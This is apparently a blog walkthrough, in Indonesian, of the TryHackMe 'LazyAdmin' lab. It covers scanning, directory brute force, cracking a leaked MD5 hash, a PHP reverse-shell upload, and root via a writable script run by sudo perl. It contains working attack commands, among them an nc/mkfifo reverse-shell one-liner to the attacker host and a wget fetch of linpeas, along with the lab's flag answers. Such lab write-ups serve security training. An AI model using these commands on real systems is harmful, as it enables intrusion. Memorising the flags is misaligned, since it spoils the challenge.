progrez.cloud

LazyAdmin - Tryhackme | Linux | Easy

10 Maret 2021

LazyAdmin

Mesin linux mudah untuk melatih keterampilan Anda Selamat bersenang-senang!


Task 1 # LazyAdmin

Mungkin ada beberapa cara untuk mendapatkan akses pengguna.


What is the user flag?


Mari kita selesaikan tantanannya...

Sekarang yang perlu dilakukan adalah melakukan scanning port terhadap mesin target $IP

┌─[cyber@cyber]─[~/Pictures]
└──╼ $sudo nmap -sV -sC -O -T5 -Pn 10.10.75.76
[sudo] password for cyber: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-11 12:30 WIT
Warning: 10.10.75.76 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.75.76
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT  STATE SERVICE VERSION
22/tcp open ssh    OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|  2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|  256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http   Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 3.13 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.99 seconds

Secara tidak langsung port yang terbuka bisa kita lihat berdasarkan scanning port di atas.


Selanjutnya ketikan ip mesin target ke browser


Lakukan brute force direktori pada mesin target meggunakan Gobuster. Ketikan perintah berikut:

┌─[cyber@cyber]─[~]
└──╼ $gobuster dir -u http://10.10.75.76/ -w ~/node-dirbuster/lists/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:           http://10.10.75.76/
[+] Threads:       10
[+] Wordlist:      /home/cyber/node-dirbuster/lists/directory-list-2.3-medium.txt
[+] Status codes:  200,204,301,302,307,401,403
[+] User Agent:    gobuster/3.0.1
[+] Timeout:       10s
===============================================================
2021/03/11 13:36:38 Starting gobuster
===============================================================
/content (Status: 301)
Progress: 415 / 220562 (0.19%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/03/11 13:36:51 Finished
===============================================================

Masuk ke direktori /content yang ada pada url direktori

Lalu brute force kembali dengan perintah di bawah:

┌─[cyber@cyber]─[~]
└──╼ $gobuster dir -u http://10.10.75.76/content -w ~/node-dirbuster/lists/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:           http://10.10.75.76/content
[+] Threads:       10
[+] Wordlist:      /home/cyber/node-dirbuster/lists/directory-list-2.3-medium.txt
[+] Status codes:  200,204,301,302,307,401,403
[+] User Agent:    gobuster/3.0.1
[+] Timeout:       10s
===============================================================
2021/03/11 13:32:16 Starting gobuster
===============================================================
/images (Status: 301)
/js (Status: 301)
/inc (Status: 301)
/as (Status: 301)
/_themes (Status: 301)
/attachment (Status: 301)
Progress: 5107 / 220562 (2.32%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/03/11 13:34:53 Finished
===============================================================

Sekarang semua direktori telah di temukan. Selanjutnya masuk pada direktori /inc dan klik mysl_backup/ lalu download mysql_bakup_20191129023059-1.5.1.sql

Selanjutnya lihat isi dari dari file .sql tersebut,

dalam file tersebut terlihat user dan password. user manager, password 42f749ade7f9e195bf475f37a44cafcb, di lapisi enkrip MD5. Jadi selanjurnya crack enkrip MD5 tersebut.

di sini saya menggunakan tools online, bisa juga teman-teman menggunakan John The Ripper atau Hashing. untuk tools onlinenya bisa teman-teman klik link berikut. CrackStation

jika sudah mendapatkan passwordnya, selanjutnya kita cari laman login. ternyata ada pada direktori /as

http://10.10.75.76/content/as/

Masukan username dan passwor yang telah di dapat tadi. Jika sudah maka kita dihadapkan dengan tampilan dasboard.

Sekarang target kita adalah mengambil alih mesin target secara sepenuhnya. Gubakan rever_shell_php

klik pada Ads lalu masukan rever_shell.

Ganti ip dengan ip tunnel kalian.

masuk di direktori http://10.10.75.76/content/inc/ads/ jalankan Netcat untuk mengakses shell.

┌─[cyber@cyber]─[~]
└──╼ $nc -lvnp 4444
Listening on 0.0.0.0 4444


Lalau klik shell php yang telah di tambahkan tadi.

┌─[cyber@cyber]─[~]
└──╼ $nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.75.76 43274
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 04:47:17 up 55 min, 0 users, load average: 0.00, 0.00, 0.01
USER    TTY     FROM            LOGIN@  IDLE  JCPU  PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

sekarang kita akan mencari flag user, jadi kita tidak tau user tersimpan di mana. Untuk mencarinya dengan menggunakan perintah berikut:

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@THM-Chal:/$ ls
ls
bin   dev  initrd.img     lost+found opt  run  srv usr     vmlinuz.old
boot  etc  initrd.img.old media   proc sbin sys var
cdrom home lib       mnt   root snap tmp vmlinuz
www-data@THM-Chal:/home/itguy$ find / -type f -name "user.txt"
www-data@THM-Chal$ cd /home/itguy
www-data@THM-Chal:/home/itguy$ ls
ls
Desktop   Downloads Pictures   Templates backup.pl       mysql_login.txt
Documents Music     Public   Videos     examples.desktop user.txt
www-data@THM-Chal:/home/itguy$ cat user.txt
cat user.txt
THM{63e5bce9271952aad1113b6f1ac28a07}
 

sekarang kita telah mendapatkan flag user


Selanjutnya kita mencari flag root. saya menggunakan linpeas.sh untuk mencari file yang dapat di manfaatkan untuk eskalasi hak istimewa. kira-kira apa yang kita manfaatkan dari file tersebut. mari kita cari.

Download linpeas.sh lalu jalankan!

setelah di jalankan kita dapat melihat semua file-file sistem yang dapat kita manfaatkan.

www-data@THM-Chal:/tmp$ wget http://10.9.169.148/linpeas/linpeas.sh
wget http://10.9.169.148/linpeas/linpeas.sh
--2021-03-12 06:38:50-- http://10.9.169.148/linpeas/linpeas.sh
Connecting to 10.9.169.148:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 325334 (318K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh         100%[===================>] 317.71K  171KB/s   in 1.9s   

2021-03-12 06:38:52 (171 KB/s) - 'linpeas.sh' saved [325334/325334]

www-data@THM-Chal:/tmp$ ls
ls
linpeas.sh
systemd-private-25e768dc1ef94c7c848e083678c277e6-colord.service-B86Ui1
systemd-private-25e768dc1ef94c7c848e083678c277e6-rtkit-daemon.service-rQBw6G
www-data@THM-Chal:/tmp$ sh linpeas.sh
sh linpeas.sh
====================================( Basic information )=====================================
OS: Linux version 4.15.0-70-generic (buildd@lgw01-amd64-006) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)) #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: THM-Chal
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)


[+] My user
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on THM-Chal:
   env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User www-data may run the following commands on THM-Chal:
   (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl


[+] Users with console
guest-3myc2b:x:998:998:Guest:/tmp/guest-3myc2b:/bin/bash
itguy:x:1000:1000:THM-Chal,,,:/home/itguy:/bin/bash
root:x:0:0:root:/root:/bin/bash


[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=1000(itguy) gid=1000(itguy) groups=1000(itguy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)


[+] Searching root files in home dirs (limit 30)
/home/
/home/itguy/backup.pl
/home/itguy/.bash_history
/root/


[+] Backup files
-rw-r--r-- 1 root root 17970 Nov 30 2019 /var/log/Xorg.0.log.old
-rwxrwxrwx 1 www-data www-data 2893 Sep 19 2016 /var/www/html/content/as/lib/pgsql_backup.php
-rwxrwxrwx 1 www-data www-data 1313 Sep 19 2016 /var/www/html/content/as/lib/mysql_backup.php
-rwxrwxrwx 1 www-data www-data 1522 Sep 19 2016 /var/www/html/content/as/lib/db_backup.php
-rwxrwxrwx 1 www-data www-data 1406 Sep 19 2016 /var/www/html/content/as/lib/sqlite_backup.php
-rw-r--r-- 1 root root 128 Feb 27 2019 /var/lib/sgml-base/supercatalog.old
-rw-r--r-- 1 root root 14947 Nov 29 2019 /usr/share/info/dir.old
-rw-r--r-x 1 root root 47 Nov 29 2019 /home/itguy/backup.pl


[+] Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Nov 29 2019 .
drwxr-xr-x 15 root root 4.0K Nov 29 2019 ..
drwxr-xr-x 3 root root 4.0K Nov 29 2019 html


/var/www/html:
total 24K
drwxr-xr-x 3 root    root    4.0K Nov 29 2019 .
drwxr-xr-x 3 root    root    4.0K Nov 29 2019 ..


[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/copy.sh
/run/lock
/run/lock/apache2
/run/php


Karna memiliki izin root jadi kita tdak dapat memanfaatkannnya, kita pakai cara lain. oke go... untuk lebih jelasnya lihat disini.

www-data@THM-Chal:/tmp$ cat /etc/copy.sh
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
www-data@THM-Chal:/tmp$ nano /etc/copy.sh
nano /etc/copy.sh
Unable to create directory /var/www/.nano: Permission denied
It is required for saving/loading search history or cursor positions.

Press Enter to continue


Error opening terminal: unknown.
www-data@THM-Chal:/tmp$ cd /etc
www-data@THM-Chal:/etc$ find /etc -type f -name "copy.sh"
find /etc -type f -name "copy.sh"
find: '/etc/ssl/private': Permission denied
find: '/etc/chatscripts': Permission denied
find: '/etc/ppp/peers': Permission denied
/etc/copy.sh
find: '/etc/cups/ssl': Permission denied
find: '/etc/polkit-1/localauthority': Permission denied
www-data@THM-Chal:/etc$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.169.148 4446 >/tmp/f' > copy.sh
<;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.169.148 4446 >/tmp/f' > copy.sh         
www-data@THM-Chal:/etc$ cat copy.sh
cat copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.169.148 4446 >/tmp/f

Jalankan revers Netcat

┌─[✗]─[cyber@cyber]─[~]
└──╼ $nc -lvnp 4446
Listening on 0.0.0.0 4446


Eksekusi file backup.pl dengan izin sudo.

[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on THM-Chal:
   env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User www-data may run the following commands on THM-Chal:
   (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl


www-data@THM-Chal:/etc$ sudo /usr/bin/perl /home/itguy/backup.pl
sudo /usr/bin/perl /home/itguy/backup.pl


┌─[✗]─[cyber@cyber]─[~]
└──╼ $nc -lvnp 4446
Listening on 0.0.0.0 4446
Connection received on 10.10.38.98 50080
# ls /root
root.txt
# cat /root/root.txt
THM{6637f41d0177b6f37cb20d775124699f}
#


Oke selesai... terimakasi telah membaca...